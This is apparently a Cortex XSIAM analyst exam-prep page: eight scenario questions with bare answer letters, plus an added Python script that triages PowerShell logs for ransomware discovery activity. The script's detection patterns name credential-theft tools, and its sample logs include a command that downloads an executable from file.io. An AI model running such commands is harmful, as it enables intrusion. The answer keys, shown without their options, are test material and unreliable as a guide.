Question 1
A security analyst has been assigned a ticket from the help desk stating that users are experiencing errors when attempting to open files on a specific network share. These errors state that the file format cannot be opened. IT has verified that the file server is online and functioning, but that all files have unusual extensions attached to them.
The security analyst reviews alerts within Cortex XSIAM and identifies malicious activity related to a possible ransomware attack on the file server. This incident is then escalated to the incident response team for further investigation.
Upon reviewing the incident, the responders confirm that ransomware was successfully executed on the file server. Other details of the attack are noted below:
- An unpatched vulnerability on an externally facing web server was exploited for initial access
- The attackers successfully used Mimikatz to dump sensitive credentials that were used for privilege escalation
- PowerShell was used on a Windows server for additional discovery, as well as lateral movement to other systems
- The attackers executed SystemBC RAT on multiple systems to maintain remote access
- Ransomware payload was downloaded on the file server via an external site, "file.io"
Refer to the scenario to answer this question:
Which forensics artifact collected by Cortex XSIAM will help the responders identify what the attackers were looking for during the discovery phase of the attack?
Correct answer: C
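The discovery step in the scenario (PowerShell used for enumeration before lateral movement) is the one that leaves a command-level trail of what the attacker was looking for. The answer options for this question are not reproduced on this page, so the example below does not stand in for option C; it only shows the idea behind the question in working code. This is an added example, not exam material and not Cortex XSIAM code: a small Python triage over constructed Windows PowerShell Event ID 4104 (ScriptBlockText) records that tags each block by tactic and pulls out the shares, hosts and URLs it referenced. The indicator patterns, host names, share names and URL are all invented for the example.

```python
"""Triage PowerShell script-block log records for discovery and lateral movement.

Added example for the ransomware scenario in Question 1; it is not exam material
and not Cortex XSIAM code. Input is a constructed list of Windows PowerShell
Event ID 4104 (ScriptBlockText) records; host names, share names, URLs and
command lines are invented for the example.
"""
import re
from collections import defaultdict

# Illustrative indicator patterns per tactic (assumed list; extend for real use).
PATTERNS = {
    "discovery": [
        r"\bGet-AD(Computer|User|Group|GroupMember|DomainController)\b",
        r"\bnet\s+(view|group|user|share|localgroup)\b",
        r"\bGet-(SmbShare|SmbMapping|NetTCPConnection|WmiObject|CimInstance)\b",
        r"\bnltest\b", r"\bwhoami\b", r"\b(dir|ls|Get-ChildItem)\s+\\\\",
    ],
    "lateral_movement": [
        r"\b(Invoke-Command|Enter-PSSession|New-PSSession|Invoke-WmiMethod)\b",
        r"\bwmic\b.*/node:", r"\bpsexec\b", r"\bCopy-Item\b.*\\\\",
    ],
    "credential_access": [r"mimikatz", r"sekurlsa", r"\blsass\b"],
    "ingress_tool_transfer": [
        r"\b(Invoke-WebRequest|iwr|curl|wget|Start-BitsTransfer)\b",
        r"\.Download(File|String)\(",
    ],
}
COMPILED = {tag: [re.compile(p, re.IGNORECASE) for p in pats]
            for tag, pats in PATTERNS.items()}

UNC_RE = re.compile(r"\\\\[\w.-]+\\[\w$.-]+")
COMPUTER_RE = re.compile(r"-ComputerName\s+([\w.,-]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def classify(script_block: str) -> set:
    """Return the tactic tags whose patterns match the script block (empty if benign)."""
    return {tag for tag, regs in COMPILED.items()
            if any(r.search(script_block) for r in regs)}


def targets(script_block: str) -> dict:
    """Extract what the command touched: UNC paths, remote hosts, URLs."""
    hosts = set()
    for group in COMPUTER_RE.findall(script_block):
        hosts.update(h for h in group.split(",") if h)
    return {
        "unc": sorted(set(UNC_RE.findall(script_block))),
        "hosts": sorted(hosts),
        "urls": sorted(set(URL_RE.findall(script_block))),
    }


def triage(events: list) -> dict:
    """Group flagged script blocks by host and tactic, with the targets each referenced."""
    report = defaultdict(lambda: defaultdict(list))
    for ev in events:
        for tag in sorted(classify(ev["script"])):
            report[ev["host"]][tag].append(
                {"time": ev["time"], "script": ev["script"], **targets(ev["script"])})
    return {host: dict(tags) for host, tags in report.items()}


def discovery_footprint(events: list) -> dict:
    """Union of shares and hosts referenced by discovery-tagged blocks: what the
    attacker was looking for, as far as the command history shows it."""
    unc, hosts = set(), set()
    for ev in events:
        if "discovery" in classify(ev["script"]):
            found = targets(ev["script"])
            unc.update(found["unc"])
            hosts.update(found["hosts"])
    return {"unc": sorted(unc), "hosts": sorted(hosts)}


# Constructed sample records (not real logs): host, timestamp, ScriptBlockText.
SAMPLE_EVENTS = [
    {"host": "WEB01", "time": "2024-05-02T01:12:03Z",
     "script": "whoami /all; nltest /dclist:corp.example"},
    {"host": "WEB01", "time": "2024-05-02T01:15:40Z",
     "script": "Get-WmiObject Win32_Share -ComputerName FS01,FS02"},
    {"host": "WEB01", "time": "2024-05-02T01:20:11Z",
     "script": r"Get-ChildItem \\FS01\Finance -Recurse -Include *.xlsx,*.docx"},
    {"host": "WEB01", "time": "2024-05-02T01:25:00Z",
     "script": "Invoke-Command -ComputerName FS01,DC01 -ScriptBlock { hostname }"},
    {"host": "FS01", "time": "2024-05-02T01:31:09Z",
     "script": "Invoke-WebRequest -Uri https://file.io/abc123 -OutFile C:\\Windows\\Temp\\svc.exe"},
    {"host": "FS01", "time": "2024-05-02T01:32:00Z",
     "script": "Get-Process | Where-Object Name -eq explorer"},
]

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_EVENTS), indent=2))
    print(json.dumps(discovery_footprint(SAMPLE_EVENTS), indent=2))
```

Running the module prints the per-host triage and the discovery footprint; on the constructed records the footprint is the Finance share on FS01 and the hosts FS01 and FS02 whose shares were enumerated, while the file.io download on FS01 lands under ingress tool transfer rather than discovery. The point for the responder is that script-block or command-history records carry the arguments (shares, filters, target hosts), which is exactly the detail that process-creation events alone often lack.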
Question 2
Which two actions will allow a security analyst to review updated commands from the core pack and interpret the results without altering the incident audit? (Choose two.)
Correct answer: B,C
Question 3
An alert for malware propagation triggers an incident. The associated playbook isolates the endpoint and notifies the SOC team. What advantages does this approach provide? (Choose two.)
Correct answer: B,C
Question 4
While investigating an alert, an analyst notices that a URL indicator has a related alert from a previous incident. The related alert has the same URL, but it resolved to a different IP address.
Which combination of two actions should the analyst take to resolve this issue? (Choose two.)
Correct answer: B,D
Question 5
Based on the image below, which two determinations can be made from the causality chain? (Choose two.)

Correct answer: B,D
Question 6
In addition to defining the Rule Name and Severity Level, which step or set of steps accurately reflects how an analyst should configure an indicator prevention rule before reviewing and saving it?
Correct answer: A
Question 7
Which two actions can an analyst take to reduce the number of false positive alerts generated by a custom BIOC? (Choose two.)
Correct answer: A,B
Question 8
Based on the image below, which two additional steps should a SOC analyst take to secure the endpoint? (Choose two.)

Correct answer: A,D